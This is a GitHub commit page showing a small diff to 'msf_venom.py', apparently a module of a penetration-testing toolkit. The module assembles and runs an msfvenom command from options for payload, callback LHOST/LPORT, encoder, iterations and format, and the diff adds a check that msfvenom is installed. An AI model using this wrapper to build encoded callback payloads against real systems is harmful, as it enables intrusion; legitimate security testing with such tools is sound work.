Skip to content

Commit

Permalink
Update msf_venom.py
Browse files Browse the repository at this point in the history
  • Loading branch information
R̭̮̗̯̳̯̜̳̱̰̮͍̯̯̲̝̥̔ͯ͆̆͌̈͌̽͒̿ͯͤ͂̚ͅͅė̥̜̗͉̦̰͈̺̟̻̦̔ͬͧ̍ͣ̉̚d̦̦̯̩̠̗͔̜̼̬̏ͫ̌̓́ͦ̆̋̅ͯ̌͆͂͑̊̑̄̊T̖̱͕̬̬͈̹̏̆ͮ̽́ͫ̎oor authored Jan 7, 2017
1 parent 9e26eb9 commit 545f1b7
Showing 1 changed file with 13 additions and 12 deletions.
25 changes: 13 additions & 12 deletions modules/msf/msf_venom.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,17 +58,18 @@ def init():
def main(run):

printk.inf("Checking if metasploit is installed: "+str(UTIL.CheckProjectInstalled("msfvenom")))
printk.wait("Wait, msfvenom working...")
secuence = "msfvenom"
secuence += " -a "+init.var['arch']
secuence += " --platform "+init.var['platform']
secuence += " -p "+init.var['payload']+" LHOST="+init.var['host']+" LPORT="+init.var['port']
secuence += " -e "+init.var['encoder']
secuence += " -i "+init.var['iterations']
secuence += " -f "+init.var['format']
secuence += " -o "+init.var['output']
secuence += " -b '"+init.var['badchars']+"'"
SYSTEM.Command_exe("Generating Payload\t\t\t",secuence,std=False)
Space()
if UTIL.CheckProjectInstalled("msfvenom"):
printk.wait("Wait, msfvenom working...")
secuence = "msfvenom"
secuence += " -a "+init.var['arch']
secuence += " --platform "+init.var['platform']
secuence += " -p "+init.var['payload']+" LHOST="+init.var['host']+" LPORT="+init.var['port']
secuence += " -e "+init.var['encoder']
secuence += " -i "+init.var['iterations']
secuence += " -f "+init.var['format']
secuence += " -o "+init.var['output']
secuence += " -b '"+init.var['badchars']+"'"
SYSTEM.Command_exe("Generating Payload\t\t\t",secuence,std=False)
Space()

# END CODE MODULE ############################################################################################

0 comments on commit 545f1b7

Please sign in to comment.